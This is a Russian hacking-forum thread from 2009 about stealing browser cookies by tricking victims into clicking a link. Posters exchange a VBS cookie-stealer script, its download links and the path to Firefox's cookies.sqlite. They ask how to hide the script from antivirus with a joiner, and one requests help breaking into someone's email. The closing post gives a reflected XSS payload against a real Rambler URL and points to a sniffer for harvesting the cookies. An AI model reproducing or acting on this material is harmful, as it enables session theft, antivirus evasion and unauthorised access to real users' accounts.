Кража куки через клик по ссылке

Discussion in 'Уязвимости Mail-сервисов' started by LemoTTT, 4 May 2009.

  1. fl00der

    fl00der Moderator

    Joined:
    17 Dec 2008
    Messages:
    1,026
    Likes Received:
    311
    Reputations:
    86
    Спс надо затестить
     
    _________________________
  2. _casper_

    _casper_ Banned

    Joined:
    2 May 2009
    Messages:
    44
    Likes Received:
    6
    Reputations:
    0
    может я и нуб.... но по-моему скрипт просто открывается как текстовый файл.
     
  3. _casper_

    _casper_ Banned

    Joined:
    2 May 2009
    Messages:
    44
    Likes Received:
    6
    Reputations:
    0
    сори, я все вразумил.
     
  4. LemoTTT

    LemoTTT Member

    Joined:
    29 Apr 2009
    Messages:
    45
    Likes Received:
    6
    Reputations:
    0
    так работает такая схема или нет, отпишитеся!
     
  5. Ice_Burn

    Ice_Burn Member

    Joined:
    10 Feb 2009
    Messages:
    217
    Likes Received:
    26
    Reputations:
    1
    Залить лучше на Народ
    Открываете файл через текстовой редактор и вписываете данные зареганного хоста
    Линк давать прямой....http://name.narod.ru/123.vbs
     
  6. Demon32

    Demon32 New Member

    Joined:
    26 Mar 2009
    Messages:
    12
    Likes Received:
    2
    Reputations:
    0

    А возможно с Мозиллы украсть куки??? не могу понять как прописать путь к куки, путь вот он C:\Documents and Settings\" & WshShell1.ExpandEnvironmentStrings("%USERNAME%") & "\Application Data\Mozilla\Firefox\Profiles\r5a2432u.default\cookies.sqlite но я так понимаю что r5a2432u.default будет на каждом компе разный. Я прав или нет?
     
  7. 25:17

    25:17 Banned

    Joined:
    7 May 2009
    Messages:
    9
    Likes Received:
    3
    Reputations:
    0
    хм... вообще-то ты бред пишешь, при определенных условиях можно угнать куки даже если нет XSS
     
    #27 25:17, 13 May 2009
    Last edited: 13 May 2009
  8. GekTer

    GekTer New Member

    Joined:
    18 Apr 2009
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    помогите пожалуста взломать мыло [email protected]. Уже всё перепробывал и ничего не получается!!!
     
  9. mazaxaka

    mazaxaka Elder - Старейшина

    Joined:
    15 Feb 2008
    Messages:
    268
    Likes Received:
    35
    Reputations:
    0
    Прочитал тему , чтото толком не понял , допутсим есть сайт у меня я хочю чтоб у каждого зашедшего тырились куки , напимер от почты и контакт или однокласники , мне для етого нужно как каждом сервисе искать хсс ? или как зедалть чтоб сливались все кучи что есть в папке кукисов у юзера?
     
  10. GrandMaster

    GrandMaster Active Member

    Joined:
    16 May 2009
    Messages:
    107
    Likes Received:
    114
    Reputations:
    25
    Прав
    сейчас проверю

    ну если сможешь на хост залить вирус который сам качается и запускается, то да. А так куки от контакта хранятся в \Documents and Settings\пользователь\Cookies
     
  11. GrandMaster

    GrandMaster Active Member

    Joined:
    16 May 2009
    Messages:
    107
    Likes Received:
    114
    Reputations:
    25
    не проверю, ссылка не работает. Кто нить перезалейте. я про это


     
  12. Demon32

    Demon32 New Member

    Joined:
    26 Mar 2009
    Messages:
    12
    Likes Received:
    2
    Reputations:
    0
    Inviz2009.narod.ru/kuki_2.rar
    без пароля
     
    2 people like this.
  13. LemoTTT

    LemoTTT Member

    Joined:
    29 Apr 2009
    Messages:
    45
    Likes Received:
    6
    Reputations:
    0
    Кто то пробовал уже, тяжело отписать?!
     
  14. WoxLtd

    WoxLtd New Member

    Joined:
    22 May 2009
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    пробовал работает!еще бы туда определение ОС и чтоб с висты тоже тырить.вот только вопрос,к чему етот скрипт прилепить чтоб антивирь не палил??? joiner2.5 и то что он слепил нод сразу удалил
     
  15. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Никому это не интересно,потому что такой кривобред даже я не напишу(
     
  16. Bendjamin

    Bendjamin New Member

    Joined:
    23 May 2009
    Messages:
    19
    Likes Received:
    1
    Reputations:
    0
    Вокс,дай свою асю в ЛС,спрошу кое-что...
     
  17. OTMAROZAK

    OTMAROZAK Banned

    Joined:
    7 Jun 2009
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
  18. OTMAROZAK

    OTMAROZAK Banned

    Joined:
    7 Jun 2009
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    я всё во скрипт вписал!!!!!
    но он чтот не пашет:((((

    на народ он не заливается!!!:(
    www.....xxx.ru/1.vbs он его открывает как обычный текстовый документ!!(((
    что делать!?
     
    #38 OTMAROZAK, 10 Jun 2009
    Last edited: 10 Jun 2009
  19. Nitrogeniys

    Nitrogeniys Member

    Joined:
    25 Dec 2008
    Messages:
    16
    Likes Received:
    5
    Reputations:
    0
    Да ё моё скачай легче просто снифер нормальный!
    Залей на бесплатку!
    И всё !
    Ссылка на один из мощнейший снифер!
    http://depositfiles.com/files/wzuru9epk
    Советую ставить на хостинг uuuq
    Строгие требования: PHP + MySQL + htaccess

    Если помог смело ставь +
     
  20. DIMON4G

    DIMON4G Elder - Старейшина

    Joined:
    25 May 2008
    Messages:
    0
    Likes Received:
    108
    Reputations:
    -1
    долбаёп, хсс нужны, без них никак ;)
    вот пример на рамблере :)
    Code:
    http://health.rambler.ru/drugs/pharmacy.html?phid=37"><script>alert(document.cookie)</script>
    alert(document.cookie) - это значит, чтобы мы увидили куки, ну и осталось тока сделать, чтобы они записывалисы в снифер, вот нормальный http://kanick.ru/sniffer/
    p.s. удачи в хеке :D и почитай вот это http://forum.antichat.ru/thread20140.html
     
    #40 DIMON4G, 14 Jun 2009
    Last edited: 14 Jun 2009